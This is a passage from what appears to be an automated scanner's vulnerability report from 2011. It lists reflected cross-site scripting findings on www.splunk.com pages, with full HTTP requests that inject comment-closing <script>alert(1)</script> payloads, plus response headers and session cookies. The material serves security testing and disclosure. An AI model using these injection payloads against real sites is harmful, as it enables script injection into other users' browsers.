This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /page/securityportal813b2--><script>alert(1)</script>84a6bb363c6 HTTP/1.1 Host: www.splunk.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Enabled=true; Apache=173.193.214.243.1296942538894423; __kti=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __utmz=204527314.1296942566.1.1.utmgclid=CPeW6bn_8aYCFcfe4Aod22SxHw|utmccn=(not%20set)|utmcmd=(not%20set); PHPSESSID=fi3ckujbctl2f58e0314143p91; __ktv=b41b-2a6a-eded-246412df7cd0af7; __utma=204527314.226449434.1296942566.1296942566.1296942566.1; XARAYASID=1mtgfd73mkm07svvqv720eu567; __utmc=204527314; __utmb=204527314.1.10.1296942566; __kts=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __ktt=ea5-22fb-55cd-38e12df7cd0af8;
Response
HTTP/1.1 200 OK Date: Sat, 05 Feb 2011 22:13:40 GMT Server: Apache/2.2.8 (EL) Vary: Host,Accept-Encoding,User-Agent X-Powered-By: PHP/5.2.6 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 18244
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
4.462. http://www.splunk.com/page/securityportal [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.splunk.com
Path: /page/securityportal
Issue detail
The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload b3528--><script>alert(1)</script>e3767e143d0 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /page/securityportal?b3528--><script>alert(1)</script>e3767e143d0=1 HTTP/1.1 Host: www.splunk.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Enabled=true; Apache=173.193.214.243.1296942538894423; __kti=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __utmz=204527314.1296942566.1.1.utmgclid=CPeW6bn_8aYCFcfe4Aod22SxHw|utmccn=(not%20set)|utmcmd=(not%20set); PHPSESSID=fi3ckujbctl2f58e0314143p91; __ktv=b41b-2a6a-eded-246412df7cd0af7; __utma=204527314.226449434.1296942566.1296942566.1296942566.1; XARAYASID=1mtgfd73mkm07svvqv720eu567; __utmc=204527314; __utmb=204527314.1.10.1296942566; __kts=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __ktt=ea5-22fb-55cd-38e12df7cd0af8;
Response
HTTP/1.1 200 OK Date: Sat, 05 Feb 2011 22:12:30 GMT Server: Apache/2.2.8 (EL) Vary: Host,Accept-Encoding,User-Agent X-Powered-By: PHP/5.2.6 Expires: 0 Cache-Control: public, must-revalidate Pragma: public ETag: 95b1f862f04ad06426eac2c79742d2b41296943951 Last-Modified: Sat, 05 Feb 2011 22:12:31 GMT Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 24224
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 1 is copied into an HTML comment. The payload bc93f--><script>alert(1)</script>065c36a19ad was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /pagebc93f--><script>alert(1)</script>065c36a19ad/sign_up HTTP/1.1 Host: www.splunk.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Enabled=true; Apache=173.193.214.243.1296942538894423; __kti=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __utmz=204527314.1296942566.1.1.utmgclid=CPeW6bn_8aYCFcfe4Aod22SxHw|utmccn=(not%20set)|utmcmd=(not%20set); PHPSESSID=fi3ckujbctl2f58e0314143p91; __ktv=b41b-2a6a-eded-246412df7cd0af7; __utma=204527314.226449434.1296942566.1296942566.1296942566.1; XARAYASID=1mtgfd73mkm07svvqv720eu567; __utmc=204527314; __utmb=204527314.1.10.1296942566; __kts=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __ktt=ea5-22fb-55cd-38e12df7cd0af8;
Response
HTTP/1.1 404 Not Found Date: Sat, 05 Feb 2011 22:11:58 GMT Server: Apache/2.2.8 (EL) Vary: Host,Accept-Encoding,User-Agent X-Powered-By: PHP/5.2.6 Expires: 0 Cache-Control: public, must-revalidate Pragma: public Set-Cookie: splunk_com_uid=1; expires=Sat, 05-Feb-2011 22:41:58 GMT; path=/ Set-Cookie: splunk_com_xt_uid=1; expires=Sat, 05-Feb-2011 22:41:58 GMT; path=/ ETag: 10e1869b01f689dcb5cc6dffdff5f4041296943918 Last-Modified: Sat, 05 Feb 2011 22:11:58 GMT Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 18319
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 2 is copied into an HTML comment. The payload 9ab55--><script>alert(1)</script>0274b98f40b was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /page/sign_up9ab55--><script>alert(1)</script>0274b98f40b HTTP/1.1 Host: www.splunk.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Enabled=true; Apache=173.193.214.243.1296942538894423; __kti=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __utmz=204527314.1296942566.1.1.utmgclid=CPeW6bn_8aYCFcfe4Aod22SxHw|utmccn=(not%20set)|utmcmd=(not%20set); PHPSESSID=fi3ckujbctl2f58e0314143p91; __ktv=b41b-2a6a-eded-246412df7cd0af7; __utma=204527314.226449434.1296942566.1296942566.1296942566.1; XARAYASID=1mtgfd73mkm07svvqv720eu567; __utmc=204527314; __utmb=204527314.1.10.1296942566; __kts=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __ktt=ea5-22fb-55cd-38e12df7cd0af8;
Response
HTTP/1.1 200 OK Date: Sat, 05 Feb 2011 22:12:26 GMT Server: Apache/2.2.8 (EL) Vary: Host,Accept-Encoding,User-Agent X-Powered-By: PHP/5.2.6 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 18202
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
4.465. http://www.splunk.com/page/sign_up [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.splunk.com
Path: /page/sign_up
Issue detail
The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload f1a1f--><script>alert(1)</script>58e995154fc was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /page/sign_up?f1a1f--><script>alert(1)</script>58e995154fc=1 HTTP/1.1 Host: www.splunk.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Enabled=true; Apache=173.193.214.243.1296942538894423; __kti=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __utmz=204527314.1296942566.1.1.utmgclid=CPeW6bn_8aYCFcfe4Aod22SxHw|utmccn=(not%20set)|utmcmd=(not%20set); PHPSESSID=fi3ckujbctl2f58e0314143p91; __ktv=b41b-2a6a-eded-246412df7cd0af7; __utma=204527314.226449434.1296942566.1296942566.1296942566.1; XARAYASID=1mtgfd73mkm07svvqv720eu567; __utmc=204527314; __utmb=204527314.1.10.1296942566; __kts=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __ktt=ea5-22fb-55cd-38e12df7cd0af8;
Response
HTTP/1.1 200 OK Date: Sat, 05 Feb 2011 22:11:21 GMT Server: Apache/2.2.8 (EL) Vary: Host,Accept-Encoding,User-Agent X-Powered-By: PHP/5.2.6 Expires: 0 Cache-Control: public, must-revalidate Pragma: public ETag: 621932632d80da436180c3b517f5cfe51296943881 Last-Modified: Sat, 05 Feb 2011 22:11:21 GMT Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 36444
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 1 is copied into an HTML comment. The payload e793d--><script>alert(1)</script>27fe6ecb2fa was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /pagee793d--><script>alert(1)</script>27fe6ecb2fa/submit_issue HTTP/1.1 Host: www.splunk.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Enabled=true; Apache=173.193.214.243.1296942538894423; __kti=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __utmz=204527314.1296942566.1.1.utmgclid=CPeW6bn_8aYCFcfe4Aod22SxHw|utmccn=(not%20set)|utmcmd=(not%20set); PHPSESSID=fi3ckujbctl2f58e0314143p91; __ktv=b41b-2a6a-eded-246412df7cd0af7; __utma=204527314.226449434.1296942566.1296942566.1296942566.1; XARAYASID=1mtgfd73mkm07svvqv720eu567; __utmc=204527314; __utmb=204527314.1.10.1296942566; __kts=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __ktt=ea5-22fb-55cd-38e12df7cd0af8;
Response
HTTP/1.1 404 Not Found Date: Sat, 05 Feb 2011 22:11:58 GMT Server: Apache/2.2.8 (EL) Vary: Host,Accept-Encoding,User-Agent X-Powered-By: PHP/5.2.6 Expires: 0 Cache-Control: public, must-revalidate Pragma: public Set-Cookie: splunk_com_uid=1; expires=Sat, 05-Feb-2011 22:41:58 GMT; path=/ Set-Cookie: splunk_com_xt_uid=1; expires=Sat, 05-Feb-2011 22:41:58 GMT; path=/ ETag: 71556ab4739ff7dd728f8c22a748b2501296943918 Last-Modified: Sat, 05 Feb 2011 22:11:58 GMT Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 18339
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 2 is copied into an HTML comment. The payload 55722--><script>alert(1)</script>48a34806daf was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /page/submit_issue55722--><script>alert(1)</script>48a34806daf HTTP/1.1 Host: www.splunk.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Enabled=true; Apache=173.193.214.243.1296942538894423; __kti=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __utmz=204527314.1296942566.1.1.utmgclid=CPeW6bn_8aYCFcfe4Aod22SxHw|utmccn=(not%20set)|utmcmd=(not%20set); PHPSESSID=fi3ckujbctl2f58e0314143p91; __ktv=b41b-2a6a-eded-246412df7cd0af7; __utma=204527314.226449434.1296942566.1296942566.1296942566.1; XARAYASID=1mtgfd73mkm07svvqv720eu567; __utmc=204527314; __utmb=204527314.1.10.1296942566; __kts=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __ktt=ea5-22fb-55cd-38e12df7cd0af8;
Response
HTTP/1.1 200 OK Date: Sat, 05 Feb 2011 22:12:28 GMT Server: Apache/2.2.8 (EL) Vary: Host,Accept-Encoding,User-Agent X-Powered-By: PHP/5.2.6 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 18232
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 1 is copied into an HTML comment. The payload 4498a--><script>alert(1)</script>9dced1a1b1 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /page4498a--><script>alert(1)</script>9dced1a1b1/track_issues HTTP/1.1 Host: www.splunk.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Enabled=true; Apache=173.193.214.243.1296942538894423; __kti=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __utmz=204527314.1296942566.1.1.utmgclid=CPeW6bn_8aYCFcfe4Aod22SxHw|utmccn=(not%20set)|utmcmd=(not%20set); PHPSESSID=fi3ckujbctl2f58e0314143p91; __ktv=b41b-2a6a-eded-246412df7cd0af7; __utma=204527314.226449434.1296942566.1296942566.1296942566.1; XARAYASID=1mtgfd73mkm07svvqv720eu567; __utmc=204527314; __utmb=204527314.1.10.1296942566; __kts=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __ktt=ea5-22fb-55cd-38e12df7cd0af8;
Response
HTTP/1.1 404 Not Found Date: Sat, 05 Feb 2011 22:11:42 GMT Server: Apache/2.2.8 (EL) Vary: Host,Accept-Encoding,User-Agent X-Powered-By: PHP/5.2.6 Expires: 0 Cache-Control: public, must-revalidate Pragma: public Set-Cookie: splunk_com_uid=1; expires=Sat, 05-Feb-2011 22:41:42 GMT; path=/ Set-Cookie: splunk_com_xt_uid=1; expires=Sat, 05-Feb-2011 22:41:42 GMT; path=/ ETag: 49f98c5d8e5e2ba907c8b57b4a3e6f8b1296943902 Last-Modified: Sat, 05 Feb 2011 22:11:42 GMT Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 18335
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 2 is copied into an HTML comment. The payload 2c1ab--><script>alert(1)</script>52e32428f4c was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /page/track_issues2c1ab--><script>alert(1)</script>52e32428f4c HTTP/1.1 Host: www.splunk.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Enabled=true; Apache=173.193.214.243.1296942538894423; __kti=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __utmz=204527314.1296942566.1.1.utmgclid=CPeW6bn_8aYCFcfe4Aod22SxHw|utmccn=(not%20set)|utmcmd=(not%20set); PHPSESSID=fi3ckujbctl2f58e0314143p91; __ktv=b41b-2a6a-eded-246412df7cd0af7; __utma=204527314.226449434.1296942566.1296942566.1296942566.1; XARAYASID=1mtgfd73mkm07svvqv720eu567; __utmc=204527314; __utmb=204527314.1.10.1296942566; __kts=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __ktt=ea5-22fb-55cd-38e12df7cd0af8;
Response
HTTP/1.1 200 OK Date: Sat, 05 Feb 2011 22:12:10 GMT Server: Apache/2.2.8 (EL) Vary: Host,Accept-Encoding,User-Agent X-Powered-By: PHP/5.2.6 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 18232
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 1 is copied into an HTML comment. The payload d1796--><script>alert(1)</script>c786baa5caf was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /partnersd1796--><script>alert(1)</script>c786baa5caf HTTP/1.1 Host: www.splunk.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Enabled=true; Apache=173.193.214.243.1296942538894423; __kti=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __utmz=204527314.1296942566.1.1.utmgclid=CPeW6bn_8aYCFcfe4Aod22SxHw|utmccn=(not%20set)|utmcmd=(not%20set); PHPSESSID=fi3ckujbctl2f58e0314143p91; __ktv=b41b-2a6a-eded-246412df7cd0af7; __utma=204527314.226449434.1296942566.1296942566.1296942566.1; XARAYASID=1mtgfd73mkm07svvqv720eu567; __utmc=204527314; __utmb=204527314.1.10.1296942566; __kts=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __ktt=ea5-22fb-55cd-38e12df7cd0af8;
4.471. http://www.splunk.com/partners [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.splunk.com
Path: /partners
Issue detail
The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload 562e4--><script>alert(1)</script>27a14dfb8bd was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /partners?562e4--><script>alert(1)</script>27a14dfb8bd=1 HTTP/1.1 Host: www.splunk.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Enabled=true; Apache=173.193.214.243.1296942538894423; __kti=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __utmz=204527314.1296942566.1.1.utmgclid=CPeW6bn_8aYCFcfe4Aod22SxHw|utmccn=(not%20set)|utmcmd=(not%20set); PHPSESSID=fi3ckujbctl2f58e0314143p91; __ktv=b41b-2a6a-eded-246412df7cd0af7; __utma=204527314.226449434.1296942566.1296942566.1296942566.1; XARAYASID=1mtgfd73mkm07svvqv720eu567; __utmc=204527314; __utmb=204527314.1.10.1296942566; __kts=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __ktt=ea5-22fb-55cd-38e12df7cd0af8;
Response
HTTP/1.1 200 OK Date: Sat, 05 Feb 2011 22:21:15 GMT Server: Apache/2.2.8 (EL) Vary: Host,Accept-Encoding,User-Agent X-Powered-By: PHP/5.2.6 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 54691
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 1 is copied into an HTML comment. The payload 35d1b--><script>alert(1)</script>538a51777cb was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
